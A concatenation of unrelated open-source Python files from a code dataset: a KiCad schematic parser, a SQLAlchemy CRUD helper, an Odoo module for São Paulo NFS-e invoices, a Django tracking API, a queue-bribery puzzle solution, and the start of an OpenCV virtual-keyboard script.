elif line[0] == 'P':\n self.position = dict(zip(key_list, values))\n elif line[0] == 'AR':\n self.references.append(dict(zip(key_list, values)))\n elif line[0] == 'F':\n self.fields.append(dict(zip(key_list, values)))\n\n # TODO: enhancements\n # * 'value' could be used instead of 'ref'\n def addField(self, *, ref, name, **field_data):\n field = {'id': None, 'ref': None, 'orient': 'H', 'posx': '0',\n 'posy': '0', 'size': '50', 'attributs': '0001',\n 'hjust': 'C', 'props': 'CNN', 'name': '~'}\n\n # 'ref' and 'name' must be quoted\n ref = ensure_quoted(ref)\n name = ensure_quoted(name)\n\n # ignore invalid items in field_data\n field_data = {key: val for (key, val) in field_data.items()\n if key in self._F_KEYS}\n\n # merge dictionaries and set the id value\n field.update(field_data, ref=ref, name=name)\n field['id'] = str(len(self.fields))\n\n self.fields.append(field)\n return field\n\n\nclass Sheet(object):\n \"\"\"\n A class to parse sheets of Schematic Files Format of the KiCad\n \"\"\"\n _S_KEYS = ['topLeftPosx', 'topLeftPosy', 'botRightPosx', 'botRightPosy']\n _U_KEYS = ['uniqID']\n _F_KEYS = ['id', 'value', 'IOState', 'side', 'posx', 'posy', 'size']\n\n _KEYS = {'S': _S_KEYS, 'U': _U_KEYS, 'F': _F_KEYS}\n\n def __init__(self, data):\n self.shape = {}\n self.unit = {}\n self.fields = []\n for line in data:\n line = line.replace('\\n', '')\n s = shlex.shlex(line)\n s.whitespace_split = True\n s.commenters = ''\n s.quotes = '\"'\n line = list(s)\n # select the keys list and default values array\n if line[0] in self._KEYS:\n key_list = self._KEYS[line[0]]\n values = line[1:] + ['']*(len(key_list) - len(line[1:]))\n if line[0] == 'S':\n self.shape = dict(zip(key_list, values))\n elif line[0] == 'U':\n self.unit = dict(zip(key_list, values))\n elif line[0][0] == 'F':\n key_list = self._F_KEYS\n values = line + ['' for n in range(len(key_list) - len(line))]\n self.fields.append(dict(zip(key_list, values)))\n\n\nclass Bitmap(object):\n \"\"\"\n A class to parse bitmaps of Schematic Files Format of the KiCad\n TODO: Need to be done, currently just stores the raw data read from file\n \"\"\"\n def __init__(self, data):\n self.raw_data = data\n\n\nclass Schematic(object):\n \"\"\"\n A class to parse Schematic Files Format of the KiCad\n \"\"\"\n def __init__(self, filename):\n f = open(filename)\n self.filename = filename\n self.header = f.readline()\n self.libs = []\n self.eelayer = None\n self.description = None\n self.components = []\n self.sheets = []\n self.bitmaps = []\n self.texts = []\n self.wires = []\n self.entries = []\n self.conns = []\n self.noconns = []\n\n if 'EESchema Schematic File' not in self.header:\n self.header = None\n sys.stderr.write('The file is not a KiCad Schematic File\\n')\n return\n\n building_block = False\n\n while True:\n line = f.readline()\n if not line:\n break\n\n if line.startswith('LIBS:'):\n self.libs.append(line)\n\n elif line.startswith('EELAYER END'):\n pass\n elif line.startswith('EELAYER'):\n self.eelayer = line\n\n elif not building_block:\n if line.startswith('$'):\n building_block = True\n block_data = []\n block_data.append(line)\n elif line.startswith('Text'):\n data = {'desc': line, 'data': f.readline()}\n self.texts.append(data)\n elif line.startswith('Wire'):\n data = {'desc': line, 'data': f.readline()}\n self.wires.append(data)\n elif line.startswith('Entry'):\n data = {'desc': line, 'data': f.readline()}\n self.entries.append(data)\n elif line.startswith('Connection'):\n data = {'desc': line}\n self.conns.append(data)\n elif 
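# The shlex configuration used repeatedly above (whitespace_split=True,
# quotes='"') is what keeps quoted KiCad field values such as "my part" intact
# as single tokens, quotes included. Illustrative line, not a real schematic:
import shlex

line = 'F 1 "my part" H 300 250 50'
s = shlex.shlex(line)
s.whitespace_split = True
s.commenters = ''
s.quotes = '"'
print(list(s))   # ['F', '1', '"my part"', 'H', '300', '250', '50']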
line.startswith('NoConn'):\n data = {'desc': line}\n self.noconns.append(data)\n\n elif building_block:\n block_data.append(line)\n if line.startswith('$End'):\n building_block = False\n\n if line.startswith('$EndDescr'):\n self.description = Description(block_data)\n if line.startswith('$EndComp'):\n self.components.append(Component(block_data))\n if line.startswith('$EndSheet'):\n self.sheets.append(Sheet(block_data))\n if line.startswith('$EndBitmap'):\n self.bitmaps.append(Bitmap(block_data))\n\n def save(self, filename=None):\n # check whether it has header, what means that sch file was loaded fine\n if not self.header:\n return\n\n if not filename:\n filename = self.filename\n\n # insert the header\n to_write = []\n to_write += [self.header]\n\n # LIBS\n to_write += self.libs\n\n # EELAYER\n to_write += [self.eelayer, 'EELAYER END\\n']\n\n # Description\n to_write += self.description.raw_data\n\n # Sheets\n for sheet in self.sheets:\n to_write += ['$Sheet\\n']\n if sheet.shape:\n line = 'S '\n for key in sheet._S_KEYS:\n line += sheet.shape[key] + ' '\n to_write += [line.rstrip() + '\\n']\n if sheet.unit:\n line = 'U '\n for key in sheet._U_KEYS:\n line += sheet.unit[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n for field in sheet.fields:\n line = ''\n for key in sheet._F_KEYS:\n line += field[key] + ' '\n to_write += [line.rstrip() + '\\n']\n to_write += ['$EndSheet\\n']\n\n # Components\n for component in self.components:\n to_write += ['$Comp\\n']\n if component.labels:\n line = 'L '\n for key in component._L_KEYS:\n line += component.labels[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n if component.unit:\n line = 'U '\n for key in component._U_KEYS:\n line += component.unit[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n if component.position:\n line = 'P '\n for key in component._P_KEYS:\n line += component.position[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n for reference in component.references:\n if component.references:\n line = 'AR '\n for key in component._AR_KEYS:\n line += reference[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n for field in component.fields:\n line = 'F '\n for key in component._F_KEYS:\n line += field[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n if component.old_stuff:\n to_write += component.old_stuff\n\n to_write += ['$EndComp\\n']\n\n # Bitmaps\n for bitmap in self.bitmaps:\n to_write += bitmap.raw_data\n\n # Texts\n for text in self.texts:\n to_write += [text['desc'], text['data']]\n\n # Wires\n for wire in self.wires:\n to_write += [wire['desc'], wire['data']]\n\n # Entries\n for entry in self.entries:\n to_write += [entry['desc'], entry['data']]\n\n # Connections\n for conn in self.conns:\n to_write += [conn['desc']]\n\n # No Connetions\n for noconn in self.noconns:\n to_write += [noconn['desc']]\n\n to_write += ['$EndSCHEMATC\\n']\n\n f = open(filename, 'w')\n f.writelines(to_write)\n","repo_name":"KiCad/kicad-library-utils","sub_path":"sch/sch.py","file_name":"sch.py","file_ext":"py","file_size_in_byte":10501,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"32"} +{"seq_id":"24817149920","text":"from sqlalchemy.orm import Session\nfrom app.crud.base import CRUDBase\nfrom app.models.train_game import TrainGame\nfrom app.schemas.train_game import TrainGameCreate, TrainGameUpdate\n\n\nclass CRUDTrainGame(CRUDBase[TrainGame, TrainGameCreate, TrainGameUpdate]):\n # Declare model specific CRUD operation methods.\n def create_train_game(self, db: Session, 
match_id_set):\n match_id_list = list(match_id_set)\n query = \"\"\n for match_id in match_id_list:\n if query == \"\":\n query = f\"('{match_id}', false)\"\n else:\n query += f\",('{match_id}', false)\"\n db.execute(\n f\"INSERT INTO train_game (match_id, is_parsed) VALUES {query} ON CONFLICT (match_id) DO NOTHING\")\n db.commit()\n return\n\n def get_train_game(self, db: Session):\n train_game_list = db.query(self.model).filter(\n self.model.is_parsed == False).all()\n return train_game_list\n\n def update_is_parsed(self, db: Session, file_title):\n\n file_name = file_title.split('.')[0]\n print(file_name)\n match_id = file_name.split('_')[1]\n print(match_id)\n db.query(self.model).filter(self.model.match_id ==\n match_id).update({self.model.is_parsed: True})\n db.commit()\n\n\ntrain_game = CRUDTrainGame(TrainGame)\n","repo_name":"fifteen-GG/15GG","sub_path":"15GG_back/app/crud/train_game.py","file_name":"train_game.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22937891707","text":"import xml.etree.ElementTree as ET\nfrom datetime import datetime\n\nfrom erpbrasil.base import misc\nfrom nfselib.paulistana.v02.PedidoEnvioLoteRPS import (\n CabecalhoType,\n PedidoEnvioLoteRPS,\n tpChaveRPS,\n tpCPFCNPJ,\n tpEndereco,\n tpRPS,\n)\nfrom unidecode import unidecode\n\nfrom odoo import _, models\nfrom odoo.exceptions import UserError\n\nfrom odoo.addons.l10n_br_fiscal.constants.fiscal import (\n EVENT_ENV_HML,\n EVENT_ENV_PROD,\n MODELO_FISCAL_NFSE,\n PROCESSADOR_OCA,\n SITUACAO_EDOC_AUTORIZADA,\n SITUACAO_EDOC_REJEITADA,\n)\n\nfrom ..constants.paulistana import CONSULTA_LOTE, ENVIO_LOTE_RPS\n\n\ndef filter_oca_nfse(record):\n if record.processador_edoc == PROCESSADOR_OCA and record.document_type_id.code in [\n MODELO_FISCAL_NFSE,\n ]:\n return True\n return False\n\n\ndef filter_paulistana(record):\n if record.company_id.provedor_nfse == \"paulistana\":\n return True\n return False\n\n\nclass Document(models.Model):\n _inherit = \"l10n_br_fiscal.document\"\n\n def convert_type_nfselib(self, class_object, object_filed, value):\n if value is None:\n return value\n\n value_type = \"\"\n for field in class_object().member_data_items_:\n if field.name == object_filed:\n value_type = field.child_attrs.get(\"type\", \"\").replace(\"xs:\", \"\")\n break\n\n if value_type in (\"int\", \"long\", \"byte\", \"nonNegativeInteger\"):\n return int(value)\n elif value_type == \"decimal\":\n return round(float(value), 2)\n elif value_type == \"string\":\n return str(value)\n else:\n return value\n\n def _serialize(self, edocs):\n edocs = super()._serialize(edocs)\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n edocs.append(record.serialize_nfse_paulistana())\n return edocs\n\n def serialize_nfse_paulistana(self):\n dados_lote_rps = self._prepare_lote_rps()\n dados_servico = self._prepare_dados_servico()\n lote_rps = PedidoEnvioLoteRPS(\n Cabecalho=self._serialize_cabecalho(dados_lote_rps),\n RPS=[self._serialize_lote_rps(dados_lote_rps, dados_servico)],\n )\n return lote_rps\n\n def _serialize_cabecalho(self, dados_lote_rps):\n return CabecalhoType(\n Versao=self.convert_type_nfselib(CabecalhoType, \"Versao\", 1),\n CPFCNPJRemetente=tpCPFCNPJ(\n CNPJ=self.convert_type_nfselib(\n CabecalhoType, \"tpCPFCNPJ\", dados_lote_rps[\"cnpj\"]\n )\n ),\n transacao=False, # TODO: Verficar origem do dado\n dtInicio=self.convert_type_nfselib(\n CabecalhoType,\n \"dtInicio\",\n 
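# create_train_game above interpolates match ids straight into the INSERT with
# f-strings. A sketch of the same upsert with bound parameters instead; this
# assumes SQLAlchemy's text() construct and executemany-style parameter lists,
# and the table/column names simply mirror the code above:
from sqlalchemy import text

def create_train_game_params(db, match_id_set):
    stmt = text(
        "INSERT INTO train_game (match_id, is_parsed) VALUES (:mid, false) "
        "ON CONFLICT (match_id) DO NOTHING"
    )
    db.execute(stmt, [{"mid": m} for m in match_id_set])  # one dict per row
    db.commit()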
dados_lote_rps[\"date_in_out\"].split(\"T\", 1)[0],\n ),\n dtFim=self.convert_type_nfselib(\n CabecalhoType, \"dtFim\", dados_lote_rps[\"date_in_out\"].split(\"T\", 1)[0]\n ),\n QtdRPS=self.convert_type_nfselib(CabecalhoType, \"QtdRPS\", \"1\"),\n ValorTotalServicos=self.convert_type_nfselib(\n CabecalhoType, \"ValorTotalServicos\", dados_lote_rps[\"total_recebido\"]\n ),\n ValorTotalDeducoes=self.convert_type_nfselib(\n CabecalhoType, \"ValorTotalDeducoes\", dados_lote_rps[\"carga_tributaria\"]\n ),\n )\n\n def _serialize_lote_rps(self, dados_lote_rps, dados_servico):\n dados_tomador = self._prepare_dados_tomador()\n return tpRPS(\n Assinatura=self.assinatura_rps(\n dados_lote_rps, dados_servico, dados_tomador\n ),\n ChaveRPS=tpChaveRPS(\n InscricaoPrestador=self.convert_type_nfselib(\n tpChaveRPS,\n \"InscricaoPrestador\",\n dados_lote_rps[\"inscricao_municipal\"].zfill(8),\n ),\n SerieRPS=self.convert_type_nfselib(\n tpChaveRPS, \"SerieRPS\", dados_lote_rps[\"serie\"]\n ),\n NumeroRPS=self.convert_type_nfselib(\n tpChaveRPS, \"NumeroRPS\", dados_lote_rps[\"numero\"]\n ),\n ),\n TipoRPS=self._map_type_rps(dados_lote_rps[\"tipo\"]),\n DataEmissao=self.convert_type_nfselib(\n tpRPS, \"DataEmissao\", dados_lote_rps[\"data_emissao\"].split(\"T\", 1)[0]\n ),\n StatusRPS=self.convert_type_nfselib(tpRPS, \"StatusRPS\", \"N\"),\n TributacaoRPS=self.convert_type_nfselib(\n tpRPS,\n \"TributacaoRPS\",\n self._map_taxation_rps(dados_lote_rps[\"natureza_operacao\"]),\n ),\n ValorServicos=self.convert_type_nfselib(\n tpRPS, \"ValorServicos\", dados_servico[\"valor_servicos\"]\n ),\n ValorDeducoes=self.convert_type_nfselib(\n tpRPS, \"ValorDeducoes\", dados_servico[\"valor_deducoes\"]\n ),\n ValorPIS=self.convert_type_nfselib(\n tpRPS, \"ValorPIS\", dados_servico[\"valor_pis_retido\"]\n ),\n ValorCOFINS=self.convert_type_nfselib(\n tpRPS, \"ValorCOFINS\", dados_servico[\"valor_cofins_retido\"]\n ),\n ValorINSS=self.convert_type_nfselib(\n tpRPS, \"ValorINSS\", dados_servico[\"valor_inss_retido\"]\n ),\n ValorIR=self.convert_type_nfselib(\n tpRPS, \"ValorIR\", dados_servico[\"valor_ir_retido\"]\n ),\n ValorCSLL=self.convert_type_nfselib(\n tpRPS, \"ValorCSLL\", dados_servico[\"valor_csll_retido\"]\n ),\n CodigoServico=self.convert_type_nfselib(\n tpRPS, \"CodigoServico\", dados_servico[\"codigo_tributacao_municipio\"]\n ),\n AliquotaServicos=self.convert_type_nfselib(\n tpRPS, \"AliquotaServicos\", dados_servico[\"aliquota\"]\n ),\n ISSRetido=\"true\" if dados_servico[\"iss_retido\"] == \"1\" else \"false\",\n # FIXME: Hardcoded\n CPFCNPJTomador=self.convert_type_nfselib(\n tpRPS,\n \"CPFCNPJTomador\",\n tpCPFCNPJ(CNPJ=dados_tomador[\"cnpj\"], CPF=dados_tomador[\"cpf\"]),\n ),\n InscricaoMunicipalTomador=self.convert_type_nfselib(\n tpRPS,\n \"InscricaoMunicipalTomador\",\n dados_tomador[\"inscricao_municipal\"],\n )\n if dados_tomador[\"codigo_municipio\"]\n == int(\"%s\" % (self.company_id.partner_id.city_id.ibge_code))\n else None,\n InscricaoEstadualTomador=self.convert_type_nfselib(\n tpRPS, \"InscricaoEstadualTomador\", dados_tomador[\"inscricao_estadual\"]\n ),\n RazaoSocialTomador=self.convert_type_nfselib(\n tpRPS, \"RazaoSocialTomador\", dados_tomador[\"razao_social\"]\n ),\n EnderecoTomador=tpEndereco(\n Logradouro=self.convert_type_nfselib(\n tpEndereco, \"Logradouro\", dados_tomador[\"endereco\"]\n ),\n NumeroEndereco=self.convert_type_nfselib(\n tpEndereco, \"NumeroEndereco\", dados_tomador[\"numero\"]\n ),\n ComplementoEndereco=self.convert_type_nfselib(\n tpEndereco, 
\"ComplementoEndereco\", dados_tomador[\"complemento\"]\n ),\n Bairro=self.convert_type_nfselib(\n tpEndereco, \"Bairro\", dados_tomador[\"bairro\"]\n ),\n Cidade=self.convert_type_nfselib(\n tpEndereco, \"Cidade\", dados_tomador[\"codigo_municipio\"]\n ),\n UF=self.convert_type_nfselib(tpEndereco, \"UF\", dados_tomador[\"uf\"]),\n CEP=self.convert_type_nfselib(tpEndereco, \"CEP\", dados_tomador[\"cep\"]),\n ),\n EmailTomador=self.convert_type_nfselib(\n tpRPS, \"EmailTomador\", dados_tomador[\"email\"]\n ),\n Discriminacao=self.convert_type_nfselib(\n tpRPS,\n \"Discriminacao\",\n unidecode(\n dados_servico[\"discriminacao\"]\n + (\n \"|%s|\" % self.fiscal_additional_data.replace(\"\\n\", \"|\")\n if self.fiscal_additional_data\n else \"\"\n )\n ),\n ),\n ValorCargaTributaria=self.convert_type_nfselib(\n tpRPS,\n \"ValorCargaTributaria\",\n dados_lote_rps[\"carga_tributaria_estimada\"],\n ),\n FonteCargaTributaria=self.convert_type_nfselib(\n tpRPS, \"FonteCargaTributaria\", \"IBPT\"\n ),\n MunicipioPrestacao=self.convert_type_nfselib(\n CabecalhoType,\n \"Versao\",\n self._map_provision_municipality(\n dados_lote_rps[\"natureza_operacao\"],\n dados_servico[\"codigo_municipio\"],\n ),\n ),\n )\n\n def _serialize_rps(self, dados):\n return tpRPS(\n InscricaoMunicipalTomador=self.convert_type_nfselib(\n tpRPS, \"InscricaoMunicipalTomador\", dados[\"inscricao_municipal\"]\n ),\n CPFCNPJTomador=tpCPFCNPJ(\n Cnpj=self.convert_type_nfselib(tpCPFCNPJ, \"Cnpj\", dados[\"cnpj\"]),\n Cpf=self.convert_type_nfselib(tpCPFCNPJ, \"Cpf\", dados[\"cpf\"]),\n ),\n RazaoSocialTomador=self.convert_type_nfselib(\n tpRPS, \"RazaoSocialTomador\", dados[\"razao_social\"]\n ),\n EnderecoTomador=tpEndereco(\n Logradouro=self.convert_type_nfselib(\n tpEndereco, \"Logradouro\", dados[\"endereco\"]\n ),\n NumeroEndereco=self.convert_type_nfselib(\n tpEndereco, \"NumeroEndereco\", dados[\"numero\"]\n ),\n ComplementoEndereco=self.convert_type_nfselib(\n tpEndereco, \"ComplementoEndereco\", dados[\"complemento\"]\n ),\n Bairro=self.convert_type_nfselib(tpEndereco, \"Bairro\", dados[\"bairro\"]),\n Cidade=self.convert_type_nfselib(\n tpEndereco, \"Cidade\", dados[\"codigo_municipio\"]\n ),\n UF=self.convert_type_nfselib(tpEndereco, \"UF\", dados[\"uf\"]),\n CEP=self.convert_type_nfselib(tpEndereco, \"CEP\", dados[\"cep\"]),\n )\n or None,\n )\n\n def assinatura_rps(self, dados_lote_rps, dados_servico, dados_tomador):\n assinatura = \"\"\n\n assinatura += dados_lote_rps[\"inscricao_municipal\"].zfill(8)\n assinatura += dados_lote_rps[\"serie\"].ljust(5, \" \")\n assinatura += dados_lote_rps[\"numero\"].zfill(12)\n assinatura += datetime.strptime(\n dados_lote_rps[\"data_emissao\"], \"%Y-%m-%dT%H:%M:%S\"\n ).strftime(\"%Y%m%d\")\n assinatura += self._map_taxation_rps(dados_lote_rps[\"natureza_operacao\"])\n assinatura += \"N\" # Corrigir - Verificar status do RPS\n assinatura += \"S\" if dados_servico[\"iss_retido\"] == \"1\" else \"N\"\n assinatura += (\n (\"%.2f\" % dados_servico[\"valor_servicos\"]).replace(\".\", \"\").zfill(15)\n )\n assinatura += (\n (\"%.2f\" % dados_lote_rps[\"carga_tributaria\"]).replace(\".\", \"\").zfill(15)\n )\n assinatura += dados_servico[\"codigo_tributacao_municipio\"].zfill(5)\n assinatura += \"2\" if dados_tomador[\"cnpj\"] else \"1\"\n assinatura += (dados_tomador[\"cnpj\"] or dados_tomador[\"cpf\"]).zfill(14)\n # assinatura += '3'\n # assinatura += ''.zfill(14)\n # assinatura += 'N'\n\n return assinatura\n\n def _map_taxation_rps(self, operation_nature):\n # FIXME: Lidar com diferença 
de tributado em São Paulo ou não\n dict_taxation = {\n \"1\": \"T\",\n \"2\": \"F\",\n \"3\": \"A\",\n \"4\": \"R\",\n \"5\": \"X\",\n \"6\": \"X\",\n }\n\n return dict_taxation[operation_nature]\n\n def _map_provision_municipality(self, operation_nature, municipal_code):\n if operation_nature == \"1\":\n return None\n else:\n return municipal_code\n\n def _map_type_rps(self, rps_type):\n dict_type_rps = {\n \"1\": \"RPS\",\n \"2\": \"RPS-M\",\n \"3\": \"RPS-C\",\n }\n\n return dict_type_rps[rps_type]\n\n def _eletronic_document_send(self):\n super()._eletronic_document_send()\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n processador = record._processador_erpbrasil_nfse()\n\n protocolo = record.authorization_protocol\n vals = dict()\n\n if not protocolo:\n for edoc in record.serialize():\n processo = None\n for p in processador.processar_documento(edoc):\n processo = p\n retorno = ET.fromstring(processo.retorno)\n\n if processo.webservice in CONSULTA_LOTE:\n if processo.resposta.Cabecalho.Sucesso:\n nfse = retorno.find(\".//NFe\")\n # TODO: Verificar resposta do ConsultarLote\n vals[\"document_number\"] = nfse.find(\".//NumeroNFe\").text\n vals[\"authorization_date\"] = nfse.find(\n \".//DataEmissaoRPS\"\n ).text\n vals[\"verify_code\"] = nfse.find(\n \".//CodigoVerificacao\"\n ).text\n record.authorization_event_id.set_done(\n status_code=4,\n response=vals[\"status_name\"],\n protocol_date=vals[\"authorization_date\"],\n protocol_number=protocolo,\n file_response_xml=processo.retorno,\n )\n continue\n\n if processo.webservice in ENVIO_LOTE_RPS:\n if retorno:\n if processo.resposta.Cabecalho.Sucesso:\n record._change_state(SITUACAO_EDOC_AUTORIZADA)\n vals[\"status_name\"] = _(\"Procesado com Sucesso\")\n vals[\"status_code\"] = 4\n vals[\"edoc_error_message\"] = \"\"\n else:\n mensagem_erro = \"\"\n for erro in retorno.findall(\"Erro\"):\n codigo = erro.find(\"Codigo\").text\n descricao = erro.find(\"Descricao\").text\n mensagem_erro += (\n codigo + \" - \" + descricao + \"\\n\"\n )\n\n vals[\"edoc_error_message\"] = mensagem_erro\n vals[\"status_name\"] = _(\"Procesado com Erro\")\n vals[\"status_code\"] = 3\n record._change_state(SITUACAO_EDOC_REJEITADA)\n record.write(vals)\n return\n\n def _document_status(self):\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n processador = record._processador_erpbrasil_nfse()\n processo = processador.consulta_nfse_rps(\n numero_rps=record.rps_number,\n serie_rps=record.document_serie,\n insc_prest=misc.punctuation_rm(\n record.company_id.partner_id.inscr_mun or \"\"\n )\n or None,\n cnpj_prest=misc.punctuation_rm(record.company_id.partner_id.cnpj_cpf),\n )\n consulta = processador.analisa_retorno_consulta(processo)\n if isinstance(consulta, dict):\n record.write(\n {\n \"verify_code\": consulta[\"codigo_verificacao\"],\n \"document_number\": consulta[\"numero\"],\n \"authorization_date\": consulta[\"data_emissao\"],\n }\n )\n record.authorization_event_id.set_done(\n status_code=4,\n response=_(\"Procesado com Sucesso\"),\n protocol_date=consulta[\"data_emissao\"],\n protocol_number=record.authorization_protocol,\n file_response_xml=processo.retorno,\n )\n return _(consulta)\n\n def cancel_document_paulistana(self):\n def doc_dict(record):\n return {\n \"numero_nfse\": record.document_number,\n \"codigo_verificacao\": record.verify_code,\n }\n\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n processador = record._processador_erpbrasil_nfse()\n processo = 
processador.cancela_documento(doc_numero=doc_dict(record))\n\n status, message = processador.analisa_retorno_cancelamento_paulistana(\n processo\n )\n\n if not status:\n raise UserError(_(message))\n\n record.cancel_event_id = record.event_ids.create_event_save_xml(\n company_id=record.company_id,\n environment=(\n EVENT_ENV_PROD if record.nfse_environment == \"1\" else EVENT_ENV_HML\n ),\n event_type=\"2\",\n xml_file=processo.envio_xml,\n document_id=record,\n )\n\n return status\n\n def _exec_before_SITUACAO_EDOC_CANCELADA(self, old_state, new_state):\n super()._exec_before_SITUACAO_EDOC_CANCELADA(old_state, new_state)\n return self.cancel_document_paulistana()\n","repo_name":"OCA/l10n-brazil","sub_path":"l10n_br_nfse_paulistana/models/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":18250,"program_lang":"python","lang":"pt","doc_type":"code","stars":196,"dataset":"github-code","pt":"32"} +{"seq_id":"37881710398","text":"import uuid\nfrom rest_framework.views import APIView\nfrom rest_framework.views import status\nfrom xenomorph_api.apps.tracking.api.services import TrackingService\nfrom xenomorph_api.apps.email_service import send_email\nfrom xenomorph_api.apps.tracking.models import (\n Tracks,\n Mark\n)\nfrom xenomorph_api.apps.services import success_response\nfrom xenomorph_api.apps.tracking.api.v1.serializers import (\n TrackingSerializer,\n UserFeedbackSerializer\n)\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.permissions import IsAuthenticated\n\n\nclass TrackingAPIView(APIView):\n # authentication_classes = [JWTAuthentication]\n # permission_classes = [IsAuthenticated]\n\n @staticmethod\n def get_weather_news_hotels(cities):\n try:\n data_list = []\n for city in cities:\n # Weather\n data_dict = {\"weather\": TrackingService.get_aggregated_weather(city)}\n\n # City Hotels\n if TrackingService.get_aggregated_hotels(city):\n data_dict = {\"hotels\": TrackingService.get_aggregated_hotels(city)}\n\n # News\n data_dict[\"News\"] = TrackingService.get_aggregated_news(city)\n data_list.append(data_dict)\n return data_list\n except Exception as ex:\n raise ValueError(f\"Unable to fetch data\")\n\n @staticmethod\n def create_many_marks(track_id, marks_list):\n track = Tracks.objects.get(id=track_id)\n for mark in marks_list:\n mark_obj = Mark.objects.create(track=track, location=mark)\n mark_obj.save()\n\n @staticmethod\n def get_serializer():\n return TrackingSerializer\n\n def post(self, request):\n try:\n print(\"sdsh\")\n print(request.data)\n marks = request.data.pop(\"marks\")\n request.data[\"id\"] = uuid.uuid4()\n serializer = self.get_serializer()\n serializer = serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n city_list = [serializer.validated_data['origin_location'], *marks,\n serializer.validated_data['destination_location']]\n cities_data = self.get_weather_news_hotels(city_list)\n self.create_many_marks(serializer.validated_data[\"id\"], marks)\n\n return success_response(status=status.HTTP_200_OK, data=cities_data)\n except Exception as ex:\n raise ex\n\n def get(self, request):\n try:\n tracks = Tracks.objects.all()\n serializer = self.get_serializer()\n serializer = serializer(tracks, many=Tracks)\n return success_response(status=status.HTTP_200_OK, data=serializer.data)\n except Exception as ex:\n raise ex\n\n\nclass FeedbackAPIView(APIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated]\n\n @staticmethod\n 
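# The error handling above walks <Erro> nodes in the returned XML with
# ElementTree. A self-contained sketch of that pattern with a made-up payload:
import xml.etree.ElementTree as ET

retorno = ET.fromstring(
    "<Retorno><Erro><Codigo>1001</Codigo>"
    "<Descricao>CPF/CNPJ invalido</Descricao></Erro></Retorno>"
)
mensagem = ""
for erro in retorno.findall("Erro"):
    mensagem += erro.find("Codigo").text + " - " + erro.find("Descricao").text + "\n"
print(mensagem)   # 1001 - CPF/CNPJ invalido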
def get_serializer():\n return UserFeedbackSerializer\n\n def post(self, request):\n try:\n request.data[\"user_id\"] = request.user.user_id\n serializer = self.get_serializer()\n serializer = serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n send_email(to=\"mustafamunir10@gmail.com\", subject=\"User Feedback\",\n body=serializer.validated_data[\"feedback\"])\n return success_response(status=status.HTTP_200_OK, data=serializer.validated_data)\n except Exception as ex:\n raise ex\n","repo_name":"MustafaMunir123/xenomorph-api","sub_path":"xenomorph_api/apps/tracking/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38545301295","text":"\"\"\"\nIt's New Year's Day and everyone's in line for the Wonderland rollercoaster ride! \nThere are a number of people queued up, and each person wears a sticker\nindicating their initial position in the queue. \nInitial positions increment by 1 from 1 at the front of the line to n at the back.\n\nAny person in the queue can bribe the person directly in front of them to swap positions. If two people swap positions, they still wear the same sticker\ndenoting their original places in line. One person can bribe at most two others. For example, if n==8 and Person 5 bribes Person 4 , the queue will look like this: \n[1,2,3,5,4,6,7,8]\n\nFascinated by this chaotic queue, you decide you must know the minimum number of bribes that took place to get the queue into its current state!\n\nFunction Description\n\nComplete the function minimumBribes in the editor below. It must print an integer representing the minimum number of bribes necessary, or Too chaotic if the line configuration is not possible.\n\"\"\"\n\n# INPUT: A queue representing state after bribes in original queue\n# OUTPUT: Minimum number of bribes to produce queue or \"Too Chaotic\"\n\n# Complete the minimumBribes function below.\n\n\ndef minimumBribes(q):\n expected = 1\n one_bribe = 2\n two_bribes = 3\n bribes = 0\n for i in range(len(q)):\n if q[i] == expected:\n expected = one_bribe\n one_bribe = two_bribes\n two_bribes += 1\n elif q[i] == one_bribe:\n bribes += 1\n one_bribe = two_bribes\n two_bribes += 1\n elif q[i] == two_bribes:\n bribes += 2\n two_bribes += 1\n else:\n return \"Too Chaotic\"\n return bribes","repo_name":"MichaelKim39/interview-questions","sub_path":"wordy/minimum-bribes.py","file_name":"minimum-bribes.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27873519669","text":"'''\nAI Virtual Keyboard using OpenCV with two fingers\nhttps://www.youtube.com/watch?v=jzXZVFqEE2I&t=26s\nhttps://www.computervision.zone/lessons/code-files-18/\nhttps://google.github.io/mediapipe/solutions/solutions.html\nhttps://google.github.io/mediapipe/solutions/hands.html\n42:00\n'''\n\nimport cv2\nfrom cvzone.HandTrackingModule import HandDetector\nfrom time import sleep\nimport numpy as np\nimport cvzone\n\n\n# c:\\users\\rockman\\appdata\\local\\programs\\python\\python310\\lib\\site-packages\\pynput-1.7.6.dist-info\\*\n\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\n\ndetector = HandDetector(detectionCon=0.8)\nkeys = [[\"Q\", \"W\", \"E\", \"R\", \"T\", \"Y\", \"U\", \"I\", \"O\", \"P\"],\n [\"A\", \"S\", \"D\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \";\"],\n [\"Z\", \"X\", \"C\", \"V\", 
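# The queue-bribery solver above tracks the next three expected stickers instead
# of counting inversions. A couple of checks against the well-known sample cases
# (this assumes the minimumBribes function defined above is in scope):
assert minimumBribes([1, 2, 3, 5, 4, 6, 7, 8]) == 1      # one bribe by Person 5
assert minimumBribes([2, 1, 5, 3, 4]) == 3
assert minimumBribes([2, 5, 1, 3, 4]) == "Too Chaotic"   # 5 moved forward 3 spots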
